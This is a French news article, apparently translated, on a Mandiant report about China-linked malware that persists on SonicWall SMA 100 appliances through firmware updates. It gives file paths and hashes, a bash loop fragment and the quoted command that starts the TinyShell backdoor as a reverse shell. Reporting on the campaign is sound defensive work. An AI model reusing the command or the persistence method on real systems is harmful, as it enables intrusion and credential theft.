Les acteurs de la menace ayant un lien avec le gouvernement chinois infectent une appliance de sécurité largement utilisée de SonicWall avec des logiciels malveillants qui restent actifs même après que l’appareil a reçu des mises à jour du micrologiciel, ont déclaré des chercheurs.
Secure Mobile Access 100 de SonicWall est une appliance d’accès distant sécurisé qui aide les organisations à déployer en toute sécurité des équipes distantes. Les clients l’utilisent pour accorder des contrôles d’accès granulaires aux utilisateurs distants, fournir des connexions VPN aux réseaux d’organisation et définir des profils uniques pour chaque employé. L’accès du SMA 100 aux réseaux clients en fait une cible attrayante pour les acteurs de la menace.
En 2021, l’appareil a été attaqué par des pirates sophistiqués qui ont exploité ce qui était alors une vulnérabilité zero-day. Les appliances de sécurité de Fortinet et Pulse Secure ont subi des attaques similaires ces dernières années.
Gagner une persistance à long terme au sein des réseaux
Jeudi, la société de sécurité Mandiant a publié un rapport selon lequel les acteurs de la menace ayant un lien présumé avec la Chine étaient engagés dans une campagne visant à maintenir la persistance à long terme en exécutant des logiciels malveillants sur les appliances SonicWall SMA non corrigées. La campagne s’est distinguée par la capacité du logiciel malveillant à rester sur les appareils même après que son micrologiciel a reçu un nouveau micrologiciel.
“Les attaquants ont déployé des efforts considérables pour assurer la stabilité et la persistance de leurs outils”, ont écrit les chercheurs de Mandiant Daniel Lee, Stephen Eckels et Ben Read. “Cela permet à leur accès au réseau de persister grâce aux mises à jour du micrologiciel et de maintenir un pied sur le réseau via le périphérique SonicWall.”
Pour atteindre cette persistance, le logiciel malveillant vérifie les mises à jour du micrologiciel disponibles toutes les 10 secondes. Lorsqu’une mise à jour est disponible, le logiciel malveillant copie le fichier archivé pour le sauvegarder, le décompresse, le monte, puis y copie l’intégralité du package de fichiers malveillants. Le logiciel malveillant ajoute également un utilisateur root de porte dérobée au fichier monté. Ensuite, le logiciel malveillant réécrit le fichier afin qu’il soit prêt pour l’installation.
“La technique n’est pas particulièrement sophistiquée, mais elle montre un effort considérable de la part de l’attaquant pour comprendre le cycle de mise à jour de l’appliance, puis développer et tester une méthode de persistance”, ont écrit les chercheurs.
Publicité
Les techniques de persistance sont cohérentes avec une campagne d’attaque en 2021 qui a utilisé 16 familles de logiciels malveillants pour infecter les appareils Pulse Secure. Mandiant a attribué les attaques à plusieurs groupes de menaces, y compris ceux suivis comme UNC2630, UNC2717, qui, selon la société, soutiennent «les priorités clés du gouvernement chinois». Mandiant a attribué les attaques en cours contre les clients SonicWall SMA 100 à un groupe identifié comme UNC4540.
« Au cours des dernières années, des attaquants chinois ont déployé plusieurs exploits et logiciels malveillants de type « zero-day » pour une variété d’appliances réseau connectées à Internet comme voie d’intrusion complète dans l’entreprise, et l’instance rapportée ici fait partie d’un modèle récent que Mandiant s’attend à poursuivre dans le futur. à court terme », ont écrit les chercheurs de Mandiant dans le rapport de jeudi.
Accès hautement privilégié
L’objectif principal du logiciel malveillant semble être de voler les mots de passe hachés de manière cryptographique pour tous les utilisateurs connectés. Il fournit également un shell Web que l’auteur de la menace peut utiliser pour installer de nouveaux logiciels malveillants.
“L’analyse d’un appareil compromis a révélé une collection de fichiers qui donnent à l’attaquant un accès hautement privilégié et disponible à l’appliance”, ont écrit les chercheurs dans le rapport de jeudi. « Le malware se compose d’une série de scripts bash et d’un seul binaire ELF identifié comme une variante de TinyShell. Le comportement global de la suite de scripts bash malveillants montre une compréhension détaillée de l’appliance et est bien adapté au système pour assurer la stabilité et la persistance.
La liste des logiciels malveillants est :
Chemin | Hacher | Fonction |
/bin/pare-feu | e4117b17e3d14fe64f45750be71dbaa6 | Processus principal des logiciels malveillants |
/bin/httpsd | 2d57bcb8351cf2b57c4fd2d1bb8f862e | Porte dérobée TinyShell |
/etc/rc.d/rc.local | 559b9ae2a578e1258e80c45a5794c071 | Persistance de démarrage pour firewalld |
/bin/iptable | 8dbf1effa7bc94fc0b9b4ce83dfce2e6 | Processus de malware principal redondant |
/bin/geoBotnetd | 619769d3d40a3c28ec83832ca521f521 | Script de porte dérobée du micrologiciel |
/bin/ifconfig6 | fa1bf2e427b2defffd573854c35d4919 | Script d’arrêt gracieux |
Le rapport continuait :
Le principal point d’entrée du logiciel malveillant est un script bash nommé firewalld, qui exécute sa boucle principale une fois pour un décompte de chaque fichier sur le système au carré : …for j in $(ls / -R) do for i in $(ls / -R ) do:… Le script est responsable de l’exécution d’une commande SQL pour accomplir le vol d’informations d’identification et l’exécution des autres composants.
La première fonction de firewalld exécute la porte dérobée TinyShell httpsd avec la commande nohup /bin/httpsd -c -d 5 -m -1 -p 51432 > /dev/null 2>&1 & si le processus httpsd n’est pas déjà en cours d’exécution. Cela définit TinyShell en mode shell inversé, lui demandant d’appeler l’adresse IP et le port susmentionnés à une heure et un jour spécifiques représentés par l’indicateur -m, avec un intervalle de balise défini par l’indicateur -d. Le binaire intègre une adresse IP codée en dur, qui est utilisée en mode shell inversé si l’argument d’adresse IP est laissé vide. Il dispose également d’un mode shell de liaison d’écoute disponible.
Les chercheurs ont déclaré qu’ils ne savaient pas quel était le vecteur d’infection initial.
La semaine dernière, SonicWall a publié un avis incitant les utilisateurs du SMA 100 à passer à la version 10.2.1.7 ou supérieure. Ces versions incluent des améliorations telles que la surveillance de l’intégrité des fichiers et l’identification des processus anormaux. Le correctif est disponible ici. Les utilisateurs doivent également consulter régulièrement les journaux pour détecter des signes de compromission, y compris des connexions anormales ou un trafic interne.